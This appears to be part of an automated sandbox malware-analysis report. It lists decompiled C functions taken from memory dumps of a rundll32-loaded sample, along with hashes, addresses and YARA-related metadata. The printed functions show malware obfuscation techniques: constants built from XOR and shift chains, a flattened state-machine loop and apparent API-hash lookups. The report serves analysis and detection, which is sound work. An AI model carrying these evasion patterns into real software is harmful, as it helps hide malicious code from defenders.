                                                                                                                                                            • String ID: <,:q$J~
                                                                                                                                                            • API String ID: 0-951887683
                                                                                                                                                            • Opcode ID: e796d55db6a29258f60e2c3a0b3bafce15da679fb3cc2482a878e09c53b2e5d3
                                                                                                                                                            • Instruction ID: a8845589b393cabcfce1230d869c4b30856098d1f38a72969cbe3e560a6dea72
                                                                                                                                                            • Opcode Fuzzy Hash: e796d55db6a29258f60e2c3a0b3bafce15da679fb3cc2482a878e09c53b2e5d3
                                                                                                                                                            • Instruction Fuzzy Hash: CD411F71D01309ABDF19CFA1C94A9EEBBB1FB54314F208199D410BA2A0D7B91B55CFA4
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0037EE81 Relevance: 2.6, Strings: 2, Instructions: 95COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                            			E0037EE81(void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				short _v48;
				short _v52;
				intOrPtr _v56;
				char _v576;
				intOrPtr* _t95;
				signed int _t99;
				signed int _t100;

				_v56 = 0x3b8b1c;
				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_v8 = 0xf9e323;
				_v8 = _v8 ^ 0x73816ffa;
				_v8 = _v8 + 0x5b26;
				_v8 = _v8 ^ 0x387262e7;
				_v8 = _v8 ^ 0x4b076809;
				_v20 = 0x75aab0;
				_v20 = _v20 ^ 0xc40c30fa;
				_v20 = _v20 + 0x78e9;
				_v20 = _v20 ^ 0xc4737271;
				_v16 = 0xa8e87a;
				_v16 = _v16 + 0xffff799a;
				_t99 = 0x33;
				_v16 = _v16 / _t99;
				_v16 = _v16 ^ 0x000fed3f;
				_v28 = 0x7feeb5;
				_v28 = _v28 + 0xffffe4f6;
				_v28 = _v28 ^ 0x007d0c9c;
				_v32 = 0x59c916;
				_t100 = 0x5d;
				_v32 = _v32 / _t100;
				_v32 = _v32 ^ 0x000d1fec;
				_v12 = 0x866588;
				_v12 = _v12 ^ 0x68ade4cb;
				_v12 = _v12 + 0xffffbaa5;
				_v12 = _v12 ^ 0x68223e43;
				_v36 = 0xbafac2;
				_v36 = _v36 ^ 0x5e34b155;
				_v36 = _v36 ^ 0x5e8c811c;
				_v24 = 0xc770cb;
				_v24 = _v24 >> 0xf;
				_v24 = _v24 ^ 0x95635bf4;
				_v24 = _v24 ^ 0x956359d7;
				_v40 = 0xbd0b83;
				_v40 = _v40 >> 3;
				_v40 = _v40 ^ 0x001e2563;
				_t101 = _v8;
				if(E00388F15(_v8,  &_v576, _t100, _v20, _v16, _v28) != 0) {
					_t95 =  &_v576;
					if(_v576 != 0) {
						while( *_t95 != 0x5c) {
							_t95 = _t95 + 2;
							if( *_t95 != 0) {
								continue;
							} else {
							}
							goto L6;
						}
						_t101 = 0;
						 *((short*)(_t95 + 2)) = 0;
					}
					L6:
					E0038DB43(_t101,  &_v44, _t101, _v32, _t101,  &_v576, _t101, _v12, _t101, _v36, _v24, _v40);
				}
				return _v44;
			}




















                                                                                                                                                            0x0037ee8a
                                                                                                                                                            0x0037ee96
                                                                                                                                                            0x0037ee99
                                                                                                                                                            0x0037ee9c
                                                                                                                                                            0x0037ee9f
                                                                                                                                                            0x0037eea6
                                                                                                                                                            0x0037eead
                                                                                                                                                            0x0037eeb4
                                                                                                                                                            0x0037eebb
                                                                                                                                                            0x0037eec2
                                                                                                                                                            0x0037eec9
                                                                                                                                                            0x0037eed0
                                                                                                                                                            0x0037eed7
                                                                                                                                                            0x0037eede
                                                                                                                                                            0x0037eee5
                                                                                                                                                            0x0037eef1
                                                                                                                                                            0x0037eef6
                                                                                                                                                            0x0037eefb
                                                                                                                                                            0x0037ef02
                                                                                                                                                            0x0037ef09
                                                                                                                                                            0x0037ef10
                                                                                                                                                            0x0037ef17
                                                                                                                                                            0x0037ef21
                                                                                                                                                            0x0037ef2a
                                                                                                                                                            0x0037ef2d
                                                                                                                                                            0x0037ef34
                                                                                                                                                            0x0037ef3b
                                                                                                                                                            0x0037ef48
                                                                                                                                                            0x0037ef4f
                                                                                                                                                            0x0037ef56
                                                                                                                                                            0x0037ef5d
                                                                                                                                                            0x0037ef64
                                                                                                                                                            0x0037ef6b
                                                                                                                                                            0x0037ef72
                                                                                                                                                            0x0037ef76
                                                                                                                                                            0x0037ef7d
                                                                                                                                                            0x0037ef84
                                                                                                                                                            0x0037ef8b
                                                                                                                                                            0x0037ef8f
                                                                                                                                                            0x0037efa0
                                                                                                                                                            0x0037efad
                                                                                                                                                            0x0037efaf
                                                                                                                                                            0x0037efbc
                                                                                                                                                            0x0037efbe
                                                                                                                                                            0x0037efc4
                                                                                                                                                            0x0037efca
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037efcc
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037efca
                                                                                                                                                            0x0037efce
                                                                                                                                                            0x0037efd0
                                                                                                                                                            0x0037efd0
                                                                                                                                                            0x0037efd4
                                                                                                                                                            0x0037eff2
                                                                                                                                                            0x0037eff7
                                                                                                                                                            0x0037f001

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: C>"h$br8
                                                                                                                                                            • API String ID: 0-573140060
                                                                                                                                                            • Opcode ID: 7ac889efe45ecef08edc0b333689601836d50e629c71184f631a065bc1168af8
                                                                                                                                                            • Instruction ID: e2fea2f67797946004dc1d9a5d5a697f271f4a9b284c746d0ef63b0a30c3a432
                                                                                                                                                            • Opcode Fuzzy Hash: 7ac889efe45ecef08edc0b333689601836d50e629c71184f631a065bc1168af8
                                                                                                                                                            • Instruction Fuzzy Hash: 8241F072C01219EBCF19DFE4C94A9EEBBB5FB08304F20819AE515B6260E3B45A55CF90
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0038AA30 Relevance: 2.6, Strings: 2, Instructions: 67COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                            			E0038AA30(signed int __edx, intOrPtr _a4, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _t83;
				signed int _t85;
				signed int _t91;

				_v40 = _v40 & 0x00000000;
				_v48 = 0xea50c7;
				_v44 = 0x183406;
				_v8 = 0x4cb37c;
				_v8 = _v8 + 0xc736;
				_v8 = _v8 + 0xd4a7;
				_t91 = __edx;
				_t85 = 0x64;
				_v8 = _v8 * 0x2d;
				_v8 = _v8 ^ 0x0dcd94f9;
				_v24 = 0x238f3e;
				_v24 = _v24 << 3;
				_v24 = _v24 ^ 0x011b8be3;
				_v20 = 0x73abc8;
				_v20 = _v20 >> 3;
				_v20 = _v20 ^ 0x00035013;
				_v16 = 0x5012b6;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 / _t85;
				_v16 = _v16 ^ 0x000aff4c;
				_v12 = 0x8c34bb;
				_v12 = _v12 | 0x8c5a3f77;
				_v12 = _v12 + 0xffff11fb;
				_v12 = _v12 ^ 0x2d4fbea1;
				_v12 = _v12 ^ 0xa19c1e56;
				_v36 = 0xff820a;
				_v36 = _v36 | 0x4fe4a4bc;
				_v36 = _v36 ^ 0x4ffdd4f4;
				_v32 = 0x36506a;
				_v32 = _v32 + 0x4de;
				_v32 = _v32 ^ 0x003709b9;
				_v28 = 0x64fd3b;
				_v28 = _v28 + 0xffff3e7a;
				_v28 = _v28 ^ 0x00656766;
				if( *((intOrPtr*)(0x393210 + __edx * 4)) == 0) {
					_t83 = E00380A0E(_t85, _t85, _a4);
					_push(_v28);
					_push(_a12);
					_push(_v32);
					_push(_t83);
					 *((intOrPtr*)(0x393210 + _t91 * 4)) = E0037CDCD(_v12, _v36);
				}
				return  *((intOrPtr*)(0x393210 + _t91 * 4));
			}

















                                                                                                                                                            0x0038aa36
                                                                                                                                                            0x0038aa3a
                                                                                                                                                            0x0038aa41
                                                                                                                                                            0x0038aa48
                                                                                                                                                            0x0038aa4f
                                                                                                                                                            0x0038aa56
                                                                                                                                                            0x0038aa62
                                                                                                                                                            0x0038aa68
                                                                                                                                                            0x0038aa69
                                                                                                                                                            0x0038aa6c
                                                                                                                                                            0x0038aa73
                                                                                                                                                            0x0038aa7a
                                                                                                                                                            0x0038aa7e
                                                                                                                                                            0x0038aa85
                                                                                                                                                            0x0038aa8c
                                                                                                                                                            0x0038aa90
                                                                                                                                                            0x0038aa97
                                                                                                                                                            0x0038aa9e
                                                                                                                                                            0x0038aaa7
                                                                                                                                                            0x0038aaaa
                                                                                                                                                            0x0038aab1
                                                                                                                                                            0x0038aab8
                                                                                                                                                            0x0038aabf
                                                                                                                                                            0x0038aac6
                                                                                                                                                            0x0038aacd
                                                                                                                                                            0x0038aad4
                                                                                                                                                            0x0038aadb
                                                                                                                                                            0x0038aae2
                                                                                                                                                            0x0038aae9
                                                                                                                                                            0x0038aaf0
                                                                                                                                                            0x0038aaf7
                                                                                                                                                            0x0038aafe
                                                                                                                                                            0x0038ab05
                                                                                                                                                            0x0038ab0c
                                                                                                                                                            0x0038ab1b
                                                                                                                                                            0x0038ab2e
                                                                                                                                                            0x0038ab33
                                                                                                                                                            0x0038ab36
                                                                                                                                                            0x0038ab39
                                                                                                                                                            0x0038ab42
                                                                                                                                                            0x0038ab4b
                                                                                                                                                            0x0038ab4b
                                                                                                                                                            0x0038ab5d

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: fge$jP6
                                                                                                                                                            • API String ID: 0-775479084
                                                                                                                                                            • Opcode ID: 9cd61206a127deec502cb2c27551f212f8ce1c2a9a9fa5334a06f70944dd0361
                                                                                                                                                            • Instruction ID: 1e112454f138fea1dc41a9d289ef6114cccae4e5e71c5a706f482e8af9c12951
                                                                                                                                                            • Opcode Fuzzy Hash: 9cd61206a127deec502cb2c27551f212f8ce1c2a9a9fa5334a06f70944dd0361
                                                                                                                                                            • Instruction Fuzzy Hash: 7C31EEB1C00209EBCB49CFE4CA4A9AEBBB5FB09308F108589D551B6220C3B95A49CF95
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00390E3A Relevance: 2.6, Strings: 2, Instructions: 61COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                            			E00390E3A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t61;
				intOrPtr _t66;
				void* _t73;
				intOrPtr* _t74;

				_t74 = _a16;
				_push(_t74);
				_push(_a12);
				_t73 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E003820B9(_t61);
				_v16 = 0x2b4f5d;
				_v16 = _v16 * 0x1c;
				_v16 = _v16 >> 8;
				_v16 = _v16 ^ 0x000abada;
				_v24 = 0x6f176d;
				_v24 = _v24 | 0x8892b5fd;
				_v24 = _v24 ^ 0x88fd6dba;
				_v12 = 0x9049ef;
				_v12 = _v12 >> 4;
				_v12 = _v12 ^ 0x7aa47b64;
				_v12 = _v12 ^ 0x7aa68413;
				_a16 = 0x9c064;
				_a16 = _a16 + 0x4e6a;
				_a16 = _a16 + 0xffffd44e;
				_a16 = _a16 | 0x475ceb65;
				_a16 = _a16 ^ 0x47532e3d;
				_v8 = 0xaf6c6f;
				_v8 = _v8 >> 6;
				_v8 = _v8 + 0xad29;
				_v8 = _v8 + 0xd52;
				_v8 = _v8 ^ 0x000b7d9e;
				_v20 = 0xd79f7b;
				_v20 = _v20 ^ 0x214a9efd;
				_v20 = _v20 >> 5;
				_v20 = _v20 ^ 0x010f9d8f;
				E00380DAF(_v16, __ecx, _v24,  *((intOrPtr*)(_t74 + 4)), _v12, _a16);
				E0037ED7E(_v8,  *((intOrPtr*)(__ecx + 0x24)), _v20,  *_t74,  *((intOrPtr*)(_t74 + 4)));
				_t66 =  *((intOrPtr*)(_t74 + 4));
				 *((intOrPtr*)(_t73 + 0x24)) =  *((intOrPtr*)(_t73 + 0x24)) + _t66;
				return _t66;
			}












                                                                                                                                                            0x00390e41
                                                                                                                                                            0x00390e45
                                                                                                                                                            0x00390e46
                                                                                                                                                            0x00390e49
                                                                                                                                                            0x00390e4b
                                                                                                                                                            0x00390e4e
                                                                                                                                                            0x00390e52
                                                                                                                                                            0x00390e53
                                                                                                                                                            0x00390e58
                                                                                                                                                            0x00390e65
                                                                                                                                                            0x00390e68
                                                                                                                                                            0x00390e6c
                                                                                                                                                            0x00390e73
                                                                                                                                                            0x00390e7a
                                                                                                                                                            0x00390e81
                                                                                                                                                            0x00390e88
                                                                                                                                                            0x00390e8f
                                                                                                                                                            0x00390e93
                                                                                                                                                            0x00390e9a
                                                                                                                                                            0x00390ea1
                                                                                                                                                            0x00390ea8
                                                                                                                                                            0x00390eaf
                                                                                                                                                            0x00390eb6
                                                                                                                                                            0x00390ebd
                                                                                                                                                            0x00390ec4
                                                                                                                                                            0x00390ecb
                                                                                                                                                            0x00390ecf
                                                                                                                                                            0x00390ed6
                                                                                                                                                            0x00390edd
                                                                                                                                                            0x00390ee4
                                                                                                                                                            0x00390eeb
                                                                                                                                                            0x00390ef2
                                                                                                                                                            0x00390ef6
                                                                                                                                                            0x00390f0c
                                                                                                                                                            0x00390f1f
                                                                                                                                                            0x00390f24
                                                                                                                                                            0x00390f2a
                                                                                                                                                            0x00390f32

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: =.SG$]O+
                                                                                                                                                            • API String ID: 0-348654084
                                                                                                                                                            • Opcode ID: 811b6f2f76830c34ea4266ae866f97b41912dbbec6264efcae1f5081a5439904
                                                                                                                                                            • Instruction ID: 1f664638101866ee1040d3696b672069fb45c7589e6e155cb63775c744e82eb0
                                                                                                                                                            • Opcode Fuzzy Hash: 811b6f2f76830c34ea4266ae866f97b41912dbbec6264efcae1f5081a5439904
                                                                                                                                                            • Instruction Fuzzy Hash: 6221257180120DEFCF45DFA4DA064AEBBB1FF45304F208598E91566224C3719B24DFA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 1001CD16 Relevance: 1.9, APIs: 1, Instructions: 445COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: H_prolog3
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 431132790-0
                                                                                                                                                            • Opcode ID: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                                                            • Instruction ID: 700ec683b01abb9f9f773201453a4dcf188a8b347697539dbb350c7cd9cff270
                                                                                                                                                            • Opcode Fuzzy Hash: bce61d6f58c59938f5edc3d8d30744f309a55dbd5b225535f57c780ac642b54b
                                                                                                                                                            • Instruction Fuzzy Hash: D5F15E7460020ABFDB15EF54C890EAE7BE9EF08350F10852AF925AF291D734ED81DB61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0038044F Relevance: 1.5, Strings: 1, Instructions: 287COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 97%
                                                                                                                                                            			E0038044F() {
				signed int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* _t309;
				intOrPtr _t310;
				void* _t311;
				intOrPtr _t321;
				intOrPtr _t325;
				void* _t329;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				signed int _t335;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr _t369;
				void* _t373;
				intOrPtr _t374;
				void* _t379;
				signed int* _t383;

				_t383 =  &_v140;
				_v16 = 0x8f0e94;
				_v12 = 0x9bdfd3;
				_t329 = 0;
				_v8 = _v8 & 0;
				_v4 = _v4 & 0;
				_v68 = 0xf0a33d;
				_v68 = _v68 ^ 0x64690d06;
				_v68 = _v68 >> 7;
				_v68 = _v68 ^ 0x00c9335c;
				_v96 = 0x45a6c;
				_v96 = _v96 + 0xffff2947;
				_v96 = _v96 >> 0x10;
				_v96 = _v96 ^ 0x00000003;
				_v56 = 0xab09eb;
				_v56 = _v56 | 0x7e070137;
				_v56 = _v56 ^ 0x7eaf09ff;
				_v80 = 0xa0f766;
				_v80 = _v80 | 0xafeefcb7;
				_v80 = _v80 ^ 0xafeefff7;
				_v48 = 0xf26de0;
				_v48 = _v48 + 0xffff1ff1;
				_v48 = _v48 ^ 0x00f18dd1;
				_v76 = 0x20d89d;
				_v76 = _v76 + 0xffff51c8;
				_v76 = _v76 | 0xd50d8457;
				_v76 = _v76 ^ 0xd52cfd33;
				_v136 = 0x1fce72;
				_v136 = _v136 >> 0xe;
				_v136 = _v136 | 0xd51e44d2;
				_t331 = 7;
				_v136 = _v136 / _t331;
				_v136 = _v136 ^ 0x1e7b1fff;
				_t379 = 0x1e2498b;
				_v92 = 0x2fa0bb;
				_v92 = _v92 >> 7;
				_v92 = _v92 << 1;
				_v92 = _v92 ^ 0x0000a534;
				_v52 = 0x3913b;
				_t332 = 0x4f;
				_v52 = _v52 / _t332;
				_v52 = _v52 ^ 0x00068b65;
				_v104 = 0xfffd78;
				_v104 = _v104 | 0x3b05e9e1;
				_v104 = _v104 + 0x741e;
				_v104 = _v104 ^ 0x7591a7da;
				_v104 = _v104 ^ 0x4990882f;
				_v84 = 0xe3d15a;
				_v84 = _v84 << 8;
				_v84 = _v84 ^ 0xbeb387df;
				_v84 = _v84 ^ 0x5d62ae1e;
				_v24 = 0xb3d42d;
				_v24 = _v24 | 0x6ee5a57e;
				_v24 = _v24 ^ 0x6efe8c67;
				_v60 = 0x6708ad;
				_v60 = _v60 + 0xd3fd;
				_v60 = _v60 ^ 0x0061923e;
				_v128 = 0x5551d4;
				_t333 = 0x50;
				_v128 = _v128 / _t333;
				_t334 = 0x7a;
				_v128 = _v128 / _t334;
				_t335 = 0x7e;
				_v128 = _v128 * 0x46;
				_v128 = _v128 ^ 0x000c63e9;
				_v28 = 0xd668f8;
				_v28 = _v28 << 0x10;
				_v28 = _v28 ^ 0x68f34519;
				_v112 = 0x194a18;
				_v112 = _v112 / _t335;
				_v112 = _v112 | 0xa7c33fbe;
				_t336 = 0x65;
				_v112 = _v112 / _t336;
				_v112 = _v112 ^ 0x01a285cf;
				_v44 = 0xc79794;
				_v44 = _v44 ^ 0x35aba003;
				_v44 = _v44 ^ 0x356e5b19;
				_v140 = 0x380362;
				_t337 = 0x79;
				_v140 = _v140 * 5;
				_v140 = _v140 ^ 0x1d7b2daf;
				_v140 = _v140 + 0x590f;
				_v140 = _v140 ^ 0x1c6cd8ab;
				_v120 = 0x1c8328;
				_v120 = _v120 / _t337;
				_t338 = 0xa;
				_v120 = _v120 / _t338;
				_v120 = _v120 | 0x9d020d0f;
				_v120 = _v120 ^ 0x9d02076d;
				_v124 = 0x55cbd6;
				_v124 = _v124 >> 9;
				_v124 = _v124 >> 0xc;
				_v124 = _v124 >> 6;
				_v124 = _v124 ^ 0x000fb83a;
				_v132 = 0xf0ac8c;
				_v132 = _v132 | 0x3804c269;
				_v132 = _v132 >> 1;
				_v132 = _v132 + 0xffff8da8;
				_v132 = _v132 ^ 0x1c781e64;
				_v88 = 0x7992e8;
				_v88 = _v88 | 0xba3027fa;
				_v88 = _v88 >> 9;
				_v88 = _v88 ^ 0x0051fda0;
				_v36 = 0x7aefbd;
				_v36 = _v36 + 0xfffff4eb;
				_v36 = _v36 ^ 0x0078a7fc;
				_v40 = 0xf56b46;
				_v40 = _v40 + 0xffff9ce0;
				_v40 = _v40 ^ 0x00fe48d4;
				_v108 = 0x27569f;
				_v108 = _v108 + 0x2c0a;
				_v108 = _v108 ^ 0xb442ac8c;
				_v108 = _v108 ^ 0xdc856b2a;
				_v108 = _v108 ^ 0x68e3c0da;
				_v116 = 0xbcba21;
				_v116 = _v116 << 0xd;
				_v116 = _v116 << 8;
				_v116 = _v116 >> 6;
				_v116 = _v116 ^ 0x011b605a;
				_v32 = 0x87c31e;
				_v32 = _v32 ^ 0x05bc26b1;
				_v32 = _v32 ^ 0x05363b16;
				_v100 = 0x4be1cd;
				_v100 = _v100 + 0xffff13dd;
				_v100 = _v100 | 0xdbf19b4f;
				_v100 = _v100 >> 7;
				_v100 = _v100 ^ 0x01b90151;
				_v64 = 0xb1223e;
				_v64 = _v64 | 0xb1fef6fe;
				_v64 = _v64 ^ 0xb1f65c82;
				_v72 = 0x9ef2a7;
				_v72 = _v72 * 0x66;
				_v72 = _v72 + 0xffffefd1;
				_v72 = _v72 ^ 0x3f51caaf;
				while(1) {
					L1:
					while(1) {
						_t309 = 0x546d98;
						do {
							L3:
							if(_t379 == _t309) {
								_t310 =  *0x393e00; // 0x0
								_t339 = _v56;
								_t311 = E00380DD6(_t339, _v124, _v132, _v20,  *((intOrPtr*)(_t310 + 0x14)),  *((intOrPtr*)(_t310 + 0x10)), _v88, _v36);
								_t383 =  &(_t383[6]);
								__eflags = _t311 - _v80;
								if(__eflags != 0) {
									_t379 = 0x64eb485;
									goto L14;
								} else {
									_t379 = 0xb6ab68a;
									_t329 = 1;
									goto L1;
								}
							} else {
								if(_t379 == 0x19763e8) {
									_push(_v128);
									_push(_v60);
									__eflags = E00379462(E0038DCF7(_v24, 0x3717f8, __eflags), _v112,  &_v20, 0, _v44, _v68) - _v96;
									_t339 = _v140;
									_t379 =  ==  ? 0x546d98 : 0x64eb485;
									E0037A8B0(_t339, _t313, _v120);
									_t383 =  &(_t383[8]);
									L14:
									_t369 =  *0x393e00; // 0x0
									_t309 = 0x546d98;
									goto L15;
								} else {
									if(_t379 == 0x1e2498b) {
										_push(_t339);
										_push(_t339);
										_t373 = 0x28;
										_t321 = E00377FF2(_t373);
										 *0x393e00 = _t321;
										 *((intOrPtr*)(_t321 + 0x14)) = 0x4000;
										_t374 =  *0x393e00; // 0x0
										_t325 = E00377FF2( *((intOrPtr*)(_t374 + 0x14)));
										_t369 =  *0x393e00; // 0x0
										_t379 = 0x19763e8;
										_t339 =  *((intOrPtr*)(_t369 + 0x14)) + _t325;
										 *((intOrPtr*)(_t369 + 0x10)) = _t325;
										 *((intOrPtr*)(_t369 + 0x1c)) = _t325;
										 *((intOrPtr*)(_t369 + 0x24)) = _t325;
										 *(_t369 + 4) = _t339;
										_t309 = 0x546d98;
										continue;
									} else {
										if(_t379 == 0x64eb485) {
											E00388519(_v32, _v100,  *((intOrPtr*)(_t369 + 0x10)));
											E00388519(_v64, _v72,  *0x393e00);
										} else {
											if(_t379 != 0xb6ab68a) {
												goto L15;
											} else {
												E0037957D(_v20, _v40, _v108, _v48, _v116);
											}
										}
									}
								}
							}
							L18:
							return _t329;
							L15:
							__eflags = _t379 - 0xfde45c5;
						} while (__eflags != 0);
						goto L18;
					}
				}
			}


























































                                                                                                                                                            0x0038044f
                                                                                                                                                            0x00380459
                                                                                                                                                            0x00380466
                                                                                                                                                            0x00380471
                                                                                                                                                            0x00380473
                                                                                                                                                            0x0038047a
                                                                                                                                                            0x00380481
                                                                                                                                                            0x00380489
                                                                                                                                                            0x00380491
                                                                                                                                                            0x00380496
                                                                                                                                                            0x0038049e
                                                                                                                                                            0x003804a6
                                                                                                                                                            0x003804ae
                                                                                                                                                            0x003804b3
                                                                                                                                                            0x003804b8
                                                                                                                                                            0x003804c0
                                                                                                                                                            0x003804c8
                                                                                                                                                            0x003804d0
                                                                                                                                                            0x003804d8
                                                                                                                                                            0x003804e0
                                                                                                                                                            0x003804e8
                                                                                                                                                            0x003804f0
                                                                                                                                                            0x003804f8
                                                                                                                                                            0x00380500
                                                                                                                                                            0x00380508
                                                                                                                                                            0x00380510
                                                                                                                                                            0x00380518
                                                                                                                                                            0x00380520
                                                                                                                                                            0x00380528
                                                                                                                                                            0x0038052d
                                                                                                                                                            0x0038053b
                                                                                                                                                            0x00380540
                                                                                                                                                            0x00380546
                                                                                                                                                            0x0038054e
                                                                                                                                                            0x00380553
                                                                                                                                                            0x0038055b
                                                                                                                                                            0x00380560
                                                                                                                                                            0x00380564
                                                                                                                                                            0x0038056c
                                                                                                                                                            0x00380578
                                                                                                                                                            0x0038057d
                                                                                                                                                            0x00380583
                                                                                                                                                            0x0038058b
                                                                                                                                                            0x00380593
                                                                                                                                                            0x0038059b
                                                                                                                                                            0x003805a3
                                                                                                                                                            0x003805ab
                                                                                                                                                            0x003805b3
                                                                                                                                                            0x003805bb
                                                                                                                                                            0x003805c0
                                                                                                                                                            0x003805c8
                                                                                                                                                            0x003805d0
                                                                                                                                                            0x003805db
                                                                                                                                                            0x003805e6
                                                                                                                                                            0x003805f1
                                                                                                                                                            0x003805f9
                                                                                                                                                            0x00380601
                                                                                                                                                            0x00380609
                                                                                                                                                            0x00380615
                                                                                                                                                            0x0038061a
                                                                                                                                                            0x00380624
                                                                                                                                                            0x00380627
                                                                                                                                                            0x00380634
                                                                                                                                                            0x00380637
                                                                                                                                                            0x0038063b
                                                                                                                                                            0x00380643
                                                                                                                                                            0x0038064e
                                                                                                                                                            0x00380656
                                                                                                                                                            0x00380661
                                                                                                                                                            0x00380671
                                                                                                                                                            0x00380675
                                                                                                                                                            0x00380681
                                                                                                                                                            0x00380686
                                                                                                                                                            0x0038068c
                                                                                                                                                            0x00380694
                                                                                                                                                            0x0038069c
                                                                                                                                                            0x003806a4
                                                                                                                                                            0x003806ac
                                                                                                                                                            0x003806b9
                                                                                                                                                            0x003806bc
                                                                                                                                                            0x003806c0
                                                                                                                                                            0x003806c8
                                                                                                                                                            0x003806d0
                                                                                                                                                            0x003806d8
                                                                                                                                                            0x003806e8
                                                                                                                                                            0x003806f0
                                                                                                                                                            0x003806f3
                                                                                                                                                            0x003806f7
                                                                                                                                                            0x003806ff
                                                                                                                                                            0x00380707
                                                                                                                                                            0x0038070f
                                                                                                                                                            0x00380714
                                                                                                                                                            0x00380719
